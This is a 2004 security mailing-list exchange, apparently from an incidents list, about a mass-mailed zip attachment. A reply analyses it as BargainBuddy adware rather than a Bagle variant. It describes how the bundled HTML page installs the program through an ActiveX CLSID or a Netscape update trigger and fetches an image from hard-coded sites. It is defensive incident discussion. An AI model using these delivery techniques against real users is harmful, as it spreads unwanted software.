Re: New Mass Mailer Virus

["Thor" <thor () hammerofgod com>]

This one's not being caught by AV (trend, anyway) -- The zip file appears to
have a randomized integer appended to the name.  I've seen both price2.zip
and price_8.zip  Looks like Price.htm checks browser settings and does a
document.write to install under IE with
CLSID:018B7EC3-EECA-11d3-8E71-0000E82C6C0D- if netscape and  launches and
installs trigger.UpdateEnabled then it uses the trigger.startsoftwareupdate
method.

However, I show that as adware/spyware, not a Bagle variant... BargainBuddy,
specifically.  However, it does have probably a 100 web sites hard-coded
into the exe that try to pull up www.domain.com/2.jpg.  It is always 2.jpg
looks like, but I was not able to get to that file on any of the referenced
sites- got 404's on all but one, where I got  " The image
"http://www.dynex.ru/2.jpg"; cannot be displayed, because it contains errors.
"

Just cursory observations...
T



----- Original Message ----- 
From: "Jeff pRICHER" <jeffpricher () yahoo com>
To: <incidents () securityfocus com>
Sent: Monday, August 09, 2004 2:19 PM
Subject: New Mass Mailer Virus


> Looks like a new Bagle variant is one the loose. I saw several hundred in
my SMTP filter so far today. They have been arriving in a zip file with
price.exe and price.html as the payload. It took some digging to find any
information on the web for this and so far the best I've found is from SANS
and can be read here http://isc.sans.org/
>